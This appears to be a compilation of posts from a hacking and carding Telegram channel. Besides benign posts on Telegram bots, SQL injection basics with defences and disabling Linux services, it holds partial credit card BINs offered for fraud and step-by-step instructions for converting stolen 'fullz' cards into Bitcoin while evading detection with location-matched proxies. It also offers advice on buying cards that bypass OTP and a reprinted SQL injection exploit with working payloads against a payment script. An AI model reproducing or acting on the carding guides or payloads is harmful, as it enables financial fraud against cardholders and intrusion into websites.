▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Ali express bins
t.me/UndercodeTesting


51080501528xxxxx
08/22
Ip - USA

🦑Bins : Netflix
545404xxxxxxxxxx
530998xxxxxxxxxx
518695xxxxxxxxxx
IP: BRAZIL

CCLEANER V4.20.3 B800006534 [PRO]

> https://play.google.com/store/apps/details?id=com.piriform.ccleaner>


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST TELEGRAM BOTS YOU SHOULD KNOW RECOMMENDED BY UNDERCODE:

1) BotFather
BotFather is the official Telegram Bot used to create bots and change settings for existing ones.

You’ll need BotFather even if you’re not going to make your own bots as a bot developer. Some bots for Telegram channel admins will ask you to use BotFather to generate Telegram Bot API tokens. So it’s good to get familiar with this procedure before we go any further.

Creating a new Telegram bot is pretty straightforward.

Just open BotFather, send /newbot command, pick a name and a username:


2) ControllerBot
ControllerBot is a feature-rich bot for Telegram channel owners.

It allows you to:

write rich-text posts with Markdown/HTML markup;
add reaction buttons (Emoji, text or both);
add button to open post comments;
schedule posts;
add self-destruct timer for temporary posts;
see channel stats.
Here is an example of how post reactions can be added with ControllerBot:


3)LivegramBot
LivegramBot is a feedback bot constructor.

Here is a self-explanatory example of this bot usage:


Feedback bots like this one can be used for everything: channels, group, bots and even websites.

4) VoteBot
VoteBot is a bot for creating polls in Telegram. Polls can be shared with friends or published in channels and groups.

Using VoteBot is very simple:


When poll is created, type @vote in your channel to open polls list:


5) Giphy GIF Search
Giphy GIF Search is a bot for searching and posting gifs. It can be used with channels as well.

Type @gif with a search query in your channel and gif suggestions will show up:


6) Telegraph
telegra.ph is a minimalistic publishing tool, that allows you to create rich-formatted posts with images, videos and other embedded stuff.

Telegram supports Instant View for the posts published with telegra.ph. It allows to read your posts right in the Telegram app, without visiting any other websites.

To manage your telegra.ph publications and log in across any number of devices try the official Telegraph bot.


7)InviteMember
InviteMember is a bot platform for subscription/membership bots

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Fast CC TO BTC :


> CC TO BTC TRICK


- Buy A Fresh Fullz CC (Visa/Mastercard)From Trusted Vendors Or *ME* (Fullz Have SSN)

- If You Bought Dallas(city),Texas(st) Cc Use Dallas Ip (must use 911 vpn or Rdp)

-After Connecting ip Go to outlook and make an email same as Cc Owner Name

- Then Go to cex.io ( cex.io is the best site to buy btc from credit cards)

- Register A New Account . Use Outlook eMail To Register as New :)

- After Registering, Verify your Email

- Ok Then We Can Add Balance To Cex.io ...... Click On Deposit then it will be redirect to payment gate.

- Now Fill Cc Details & Choose The Amount ( Choose Below 150$ First then succeeded we Can add more)

- Then Fill the Billing Address & SSN (Fullz Cc Will Have Billing Address & SSN)

- Then Click Proceed

- Then Account Will Be Funded with your choosed Amount (unless you use dead card) & After Success Fund More Amount How Much You Can Do With The Credit Card

- Now go to home page and click Buy/Sell

- Buy Bitcoin With Your Deposited Amount (If You deposited 700$ buy btc below 700$)

- Now you'll be turned into 700$ to Btc

- Now Go to Withdraw select Btc Then put your wallet address & select amount then click withdraw

Hurreyyy!!!! Now The Btc Instantly Will transfer to Your wallet.

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The 2018 Paypall CVE IS NOW PUBLIC FREE
> PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection
t.me/UndercodeTesting

🦑Tested by Undercode :

# POC:
# 1)
# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
#
#[PATH]/accomodation.php
#...
#50 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "' AND NUMPERSON = " . $_POST['person'];
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "'";
#56
#57
#58
#59 }
#60
#61 $accomodation = ' | ' . $_GET['q'];
#62 ?>
#...
GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:55:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 2)
# http://localhost/[PATH]/index.php?p=rooms&q=[SQL]
#
#[PATH]/room_rates.php
#...
#50 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND NUMPERSON = " . $_POST['person'];
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ROOM LIKE '%" . $_GET['q'] . "%'";
#56
#57
#58 }else{
#59 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID";
#60 }
#61
#62 $accomodation = ' | ' . @$_GET['q'];
#63 ?>
#...
GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:58:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

# POC:
# 3)
# http://localhost/[PATH]/admin/login.php
#
#[PATH]/admin/login.php
#...
#58 if (isset($_POST['btnlogin'])) {
#59 //form has been submitted1
#60
#61 $uname = trim($_POST['email']);
#62 $upass = trim($_POST['pass']);
#...

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 last paypall exploit

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑 how to buy a working cc ?
pinterest.com/undercode_Testing

> Are u a hacker then u easily bypass otp or you don't know ss7 attack. Then buy ssn+dob payment base cc. It cc don't require otp on payment. You fill ssn+dob on payment getway. then pay is susses.


🦑 Where i buy amazon egift cards??


1) Go on
https://www.mtcgame.com/en-GB

2) Login on your created account.
It payment getaway is easy and 1 more site https://www.mygiftcardsupply.com/shop/amazon-gift-cards/


have easy pay. Getway .


🦑 Carding tools

Socks5/rdp ,mac address changer,ccleaner.

🦑 How to use securely???


Socks5/rdp.-- You do not use the same zip code for the owner of cc or cc. use rdp/socks5 according to state.

Don't clean cookies in carding time.


Then fill ssn and dob on payment getway..

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SQL INJECTION FOR BEGINERS FULL TUTORIAL


1) SQL injection is one of the more common network attack methods. Instead of using the BUG of the operating system to implement the attack, he aims at the negligence of the programmer when programming, through SQL statements, to achieve accountless login, or even tamper with the database.


2) When an application uses input to construct a dynamic SQL statement to access the database, a SQL injection attack occurs . If the code uses stored procedures, and these stored procedures are passed as strings containing unfiltered user input, SQL injection can also occur .

3) SQL injection may cause an attacker to use an application to log in and execute commands in the database. If the application uses an overprivileged account to connect to the database, this problem can become very serious. In some forms, the content entered by the user is directly used to construct dynamic SQL commands or used as input parameters of stored procedures. These forms are particularly vulnerable to SQL injection attacks. While many website programs are written, they do not judge the validity of user input or improper handling of variables in the program itself, which poses potential security risks to the application.

4) In this way, the user can submit a piece of database query code, obtain some sensitive information or control the entire server based on the results returned by the program, and SQL injection occurs.


🦑 The general idea of ​​SQL injection attacks,

1) Find the location of SQL injection

2)Determine the server type and background database type

3) Perform SQL injection attacks against unsuitable server and database features


🦑 A simple example,

SQL> create table account(id number primary key, name varchar2(10), password varchar2(20));
Table created.

SQL> insert into account values(1, 'bisal', '111111');
1 row created.

SQL> commit;
Commit complete.

SQL> select * from account;
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111

SQL> select * from account where name='' or 1=1 -- and password='';
ID NAME PASSWORD
---------- ---------- --------------------
1 bisal 111111


After the condition, "username = 'xx' or 1 = 1", the user name is equal to "empty or1 = 1", because 1 = 1 is always ture, then this condition will succeed, in addition, add two "-" after this, this It means comments, it will comment the following statements, so that they will not work, so that the statements can always be executed correctly, and users can easily cheat the system and obtain a legal identity.



The reason for the SQL injection vulnerability is to splice SQL parameters. That is, the query parameters used for input are directly spliced ​​into the SQL statement, resulting in a SQL injection vulnerability. E.g,

select id, password from user where id = 2;


If the statement is obtained by stitching SQL strings, for example,

String sql = "select password from user where id =" + id;


Where id is a parameter entered by the user, then, if the user enters "2 or 1 = 1" to perform the SQL injection attack, the above statement (select id, password from user where id = 2 or 1 = 1;), All the records in the user table are found out, which is a typical SQL injection.



Imagine that if the user inputs some dangerous operations, such as drop table, the attack through SQL injection is not just a data leak, it may be a damage to the database.

🦑 As for the solution, someone summed it up,

1) Never trust user input. To verify the user's input, you can use regular expressions, or limit the length, convert single quotes and double "-", etc.

2) Never use dynamic assembly SQL, you can use parameterized SQL (bound variables) or directly use stored procedures for data query access.

3) Never use a database connection with administrator rights, use a separate database connection with limited rights for each application.

4) Do not store confidential information directly, encrypt or hash passwords and sensitive information.

5) The application's exception information should give as few hints as possible. It is best to use a custom error message to wrap the original error message.

6) The detection method of SQL injection generally adopts auxiliary software or website platform to detect.

🦑 LEarning about SQL injection More for free :


1) Sqli-labs
Sqli-labs is a game tutorial written by an Indian programmer to learn SQL injection. It can be installed locally, accessed by a browser, and learn various SQL injection cases

https://github.com/Audi-1/sqli-labs

2)OWASP

Regarding information security, OWASP (Open Web Application Security Project) is an open source organization. There will be various open source projects that you can participate in or use with conditions. If you are interested, you can watch it.

http://www.owasp.org.cn/owasp-project

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Linux system boot items cleanup full by undercode
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) In general, general-purpose Linux distributions start various related service processes at boot time, including many services that you may not need to use, such as Bluetooth bluetooth, Avahi, modem manager ModemManager, ppp-dns. : Here the author typo ppp-dns should be pppd-dns) and other service processes, what are these things? Where is it used and what function?

2) Systemd provides many good tools for viewing system startup, and can also control what runs when the system starts. In this article, I will explain how to shut down some annoying processes in the Systemd class distribution.

🦑 View boot items
In the past, you can easily see /etc/init.d which service processes will be started at boot time by looking at them. Systemd is displayed in different ways. You can use the following command to list the service processes that are allowed to start.

1) $ systemctl list-unit-files --type=service | grep enabled
accounts-daemon.service enabled
anacron-resume.service enabled
anacron.service enabled
bluetooth.service enabled
brltty.service enabled
[...]

2) At the top of this list, for me, the Bluetooth service is redundant, because I do n’t need to use Bluetooth on this computer, so I do n’t need to run this service. The following command will stop the service process, and make it not start at boot.

3) $ sudo systemctl stop bluetooth.service

4) $ sudo systemctl disable bluetooth.service

🦑You can use the following command to determine whether the operation was successful.

1) >< $ systemctl status bluetooth.service
bluetooth.service - Bluetooth service
Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: enabled)
Active: inactive (dead)
Docs: man:bluetoothd(8)

2)The deactivated service process can still be started by another service process. If you really want to not start the process when the system starts under any circumstances, you do n’t need to uninstall it, just cover it up to stop the process from booting under any circumstances.

3) $ sudo systemctl mask bluetooth.service
Created symlink from /etc/systemd/system/bluetooth.service to /dev/null.

4) Once you are satisfied that disabling the process to start without negative effects, you can also choose to uninstall the program.

🦑 The following service list can be obtained by executing the command:

1) $ systemctl list-unit-files --type=service
UNIT FILE STATE
accounts-daemon.service enabled
acpid.service disabled
alsa-restore.service static
alsa-utils.service masked

2) You cannot enable or disable static services, because static services are dependent on other processes, which does not mean that they run on their own.

🦑What services can be prohibited?

1) How do you know which services you need and which ones can be safely disabled? It always depends on your individual needs.

2) Here is an example of the role of several service processes. Many service processes are distribution-specific, so you should look at your distribution documentation (for example, via Google or StackOverflow).

3) accounts-daemon.service is a potential security risk. It is part of AccountsService, which allows programs to obtain or manipulate user account information. I don't think there are good reasons for me to allow such background operations, so I chose to mask the service process.

4) avahi-daemon.service is used for zero-configuration network discovery, making it easy for computers to discover printers or other hosts on the network. I always disable it and do n’t miss it.

<> brltty.service provides support for Braille devices, such as Braille displays.

> debug-shell.service opens a huge security hole (the service provides a passwordless root shell to help debug systemd problems), unless you are using the service, otherwise never start the service.

> ModemManager.service is a daemon activated by dbus to provide a mobile broadband (2G / 3G / 4G) interface. If you do n’t have this interface, whether it ’s a built-in interface, or a phone paired via Bluetooth, and USB Adapter, then you do not need the service.

> pppd-dns.service is a relic of computer development, if you use dial-up to access the Internet, keep it, otherwise you do not need it.

> rtkit-daemon.service sounds terrible, it sounds like a rootkit. But you need this service because it is a real-time kernel scheduler.

> whoopsie.service is an Ubuntu error reporting service. It is used to collect Ubuntu system crash reports and send reports

> wpa_supplicant.service is only required when you use Wi-Fi connection

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁